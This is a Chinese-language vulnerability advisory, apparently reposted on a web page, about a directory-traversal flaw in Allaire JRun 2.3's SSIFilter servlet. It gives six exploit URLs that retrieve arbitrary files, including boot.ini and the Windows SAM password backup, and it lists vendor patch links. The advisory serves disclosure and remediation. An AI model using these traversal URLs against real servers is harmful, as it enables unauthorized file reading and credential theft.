allaire jrun 2.3 查看任意文件漏洞

涉及程序：
jrun

描述：
allaire jrun 2.3 查看任意文件漏洞

详细：
allaire 的 jrun 服务器 2.3上存在多重显示代码漏洞。该漏洞允许攻击者在 web 服务器上查看根目录下的任意文件的源代码。
jrun 2.3 使用 java servlets 解析各种各样类型的页面（例如：html, jsp等等）。基于rules.properties 和 servlets.properties 的文件设置，可能利用url前缀"/servlet/"调用任何servlet。

它可能使用 jrun 的 ssifilter servlet 在目标系统上检索任意的文件。下列 2 个例子显示出能被用来检索任意的文件的 urls ：

http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.ssifilter/../../t
est.jsp

http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.ssifilter/../../.
./../../../../boot.ini

http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.ssifilter/../../.
./../../../../winnt/repair/sam._
http://jrun:8000/servlet/ssifilter/../../test.jsp
http://jrun:8000/servlet/ssifilter/../../../../../../../boot.ini

http://jrun:8000/servlet/ssifilter/../../../../../../../winnt/repair/sam._

注意：假设jrun在主机“ jrun ”上运行，端口8000。

受影响的系统：
allaire jrun 2.3.x

解决方案：
下载并安装补丁：
allaire patch jr233p_asb00_28_29
http://download.allaire.com/jrun/jr233p_asb00_28_29.zip
windows 95/98/nt/2000 and windows nt alpha

allaire patch jr233p_asb00_28_29tar
http://download.allaire.com/jrun/jr233p_asb00_28_29.tar.gz
unix/linux patch - gnu gzip/tar

ICP备案编号:粤ICP备06052964号

www.sosof.com

选择显示字体大小

allaire jrun 2.3 查看任意文件漏洞

关键字本文所属关键字

相关与本文相关文章

分类所有文章关键字导航

源码编程相关

SQL数据库相关

手机无线相关

网页设计制作相关

网站建设推广相关

操作系统/服务器相关

图形图像多媒体相关

标准网站致力的规范

www.sosof.com

选择显示字体大小

allaire jrun 2.3 查看任意文件漏洞

shouchang();

关键字 本文所属关键字

相关 与本文相关文章

分类 所有文章关键字导航

源码编程相关

SQL数据库相关

手机无线相关

网页设计制作相关

网站建设推广相关

操作系统/服务器相关

图形图像多媒体相关

标准 网站致力的规范

关键字本文所属关键字

相关与本文相关文章

分类所有文章关键字导航

标准网站致力的规范